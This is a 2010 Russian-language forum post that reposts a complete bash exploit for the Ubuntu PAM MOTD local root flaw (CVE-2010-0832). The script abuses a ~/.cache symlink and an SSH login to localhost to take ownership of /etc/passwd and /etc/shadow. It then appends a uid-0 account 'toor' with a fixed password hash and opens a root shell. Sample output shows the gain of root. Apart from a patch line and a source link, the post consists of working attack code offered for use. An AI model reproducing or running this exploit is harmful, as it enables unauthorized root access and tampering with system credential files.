Выложен Ubuntu PAM MOTD Local Root Exploit

Discussion in 'Уязвимости' started by kfor, 14 Jul 2010.

  1. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Code:
    #!/bin/bash
    #
    # Exploit Title: Ubuntu PAM MOTD local root
    # Date: July 9, 2010
    # Author: Anonymous
    # Software Link: http://packages.ubuntu.com/
    # Version: pam-1.1.0
    # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
    # CVE: CVE-2010-0832
    # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
    # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
    #
    # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
    # Does not prompt for login by creating temporary SSH key and authorized_keys entry.
    #
    #   [email protected]:~$ bash ubuntu-pam-motd-localroot.sh
    #   [*] Ubuntu PAM MOTD local root
    #   [*] Backuped /home/user/.ssh/authorized_keys
    #   [*] SSH key set up
    #   [*] Backuped /home/user/.cache
    #   [*] spawn ssh
    #   [+] owned: /etc/passwd
    #   [*] spawn ssh
    #   [+] owned: /etc/shadow
    #   [*] Restored /home/user/.cache
    #   [*] Restored /home/user/.ssh/authorized_keys
    #   [*] SSH key removed
    #   [+] Success! Use password toor to get root
    #   Password:
    #   [email protected]:/home/user# id
    #   uid=0(root) gid=0(root) groupes=0(root)
    #
    P='toor:x:0:0:root:/root:/bin/bash'
    S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
    echo "[*] Ubuntu PAM MOTD local root"
    [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
    [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
    [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
    backup() {
        [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
        [ -e "$1" ] || return 0
        mv "$1"{,.bak} || return 1
        echo "[*] Backuped $1"
    }
    restore() {
        [ -e "$1" ] && rm -rf "$1"
        [ -e "$1".bak ] || return 0
        mv "$1"{.bak,} || return 1
        echo "[*] Restored $1"
    }
    key_create() {
        backup ~/.ssh/authorized_keys
        ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
        [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
        mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
        echo "[*] SSH key set up"
    }
    key_remove() {
        rm -f "$KEY"
        restore ~/.ssh/authorized_keys
        echo "[*] SSH key removed"
    }
    own() {
        [ -e ~/.cache ] && rm -rf ~/.cache
        ln -s "$1" ~/.cache || return 1
        echo "[*] spawn ssh"
        ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
        [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
        echo "[+] owned: $1"
    }
    bye() {
        key_remove
        exit 1
    }
    KEY="$(mktemp -u)"
    key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
    backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
    own /etc/passwd && echo "$P" >> /etc/passwd
    own /etc/shadow && echo "$S" >> /etc/shadow
    restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
    key_remove
    echo "[+] Success! Use password toor to get root"
    su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
      chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
    
    Источник --> http://inj3ct0r.com/exploits/13209
     
Loading...